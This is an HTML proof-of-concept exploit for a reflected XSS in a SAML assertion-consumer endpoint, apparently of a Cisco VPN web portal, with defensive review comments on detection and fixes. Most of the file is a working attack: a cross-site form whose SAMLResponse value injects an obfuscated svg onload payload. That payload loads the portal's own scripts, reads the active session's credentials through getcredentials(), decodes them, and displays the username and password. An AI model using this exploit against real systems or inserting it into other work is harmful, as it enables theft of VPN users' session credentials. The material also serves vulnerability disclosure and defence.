user_password_xss.html
<!DOCTYPE html>
<!--
  Proof-of-concept page for a reflected XSS in the SAML assertion-consumer
  endpoint addressed below (/+CSCOE+/saml/sp/acs). It builds a cross-site POST
  whose SAMLResponse field carries markup instead of a SAML message.

  Review notes (defensive):
  * Nothing on this page submits the form automatically; the request is sent
    only when the submit button is clicked.
  * A genuine SAMLResponse in the HTTP POST binding is base64 text, so a value
    on this path containing a double quote or angle brackets is a useful
    detection signal.
  * The server-side fix is to HTML-encode the reflected parameter and to reject
    values that do not decode as a SAML message. NOTE(review): the reflection
    itself is inferred from the payload shape; the server response is not shown
    in this file.
-->
<html lang="en">
<head></head>
<body>
<!-- Form posted to the target origin; action is filled in by the script below. -->
<form id="csrf" action="" method="POST">
<!-- Starts empty; the script assigns the crafted value at load time. -->
<input id="SAMLResponse" name="SAMLResponse" value=''>
<input type="submit" value="XSS">
</form>
<script>
// target, form, payload and saml are assigned without var/let/const, so they
// become implicit globals of this page.
target = "https://localhost"; // Change me
form = document.getElementById("csrf");
// Endpoint under test: the SAML ACS path with a fixed tgname query parameter.
form.action = target + "/+CSCOE+/saml/sp/acs?tgname=a";
// The template literal below is runtime data, not code of this page: it is
// base64-encoded as a whole (including its inline // notes) and only evaluated
// if the target reflects it. Going by those notes, it stubs submit_saml to stop
// the redirect to logon.html, loads common.js and appstart.js from the target,
// and on readystatechange decodes two fields returned by getcredentials() with
// hex_2_ascii + rot13 and shows them in an alert() (presumably username and
// password, judging by the file name; confirm against appstart.js).
// Defender takeaway: hex + rot13 is encoding, not protection, so any script
// running in that origin can read whatever getcredentials() exposes.
payload = `
submit_saml = function() {}; //Prevent page from redirecting to logon.html causing the sesison to clear.
s = document.createElement("script");
s.src = "`+ target + `/+CSCOE+/common.js"; // Cisco string utilities: hex_2_ascii & rot13.
document.body.appendChild(s);
s = document.createElement("script");
s.src = "` + target + `/+CSCOE+/appstart.js"; // Utilities leaking active session credentials via getcredentials().
document.body.appendChild(s);
document.onreadystatechange = function() {
creds = getcredentials();
alert(rot13(hex_2_ascii(creds.split('/')[0].split('=')[1])) + ":" + rot13(hex_2_ascii(creds.split('/')[1].split('=')[1])));
}`;
saml = document.getElementById('SAMLResponse');
// The leading quote and angle bracket suggest the value is echoed inside a
// double-quoted HTML attribute without encoding (inferred, see header note).
// The payload is wrapped in atob() so it contains no quotes or newlines of its
// own. A response CSP that disallows inline event handlers and eval would stop
// this step even if the reflection remained.
saml.value = '"><svg/onload=eval(atob("' + btoa(payload) + '"))>';
</script>
</body>
</html>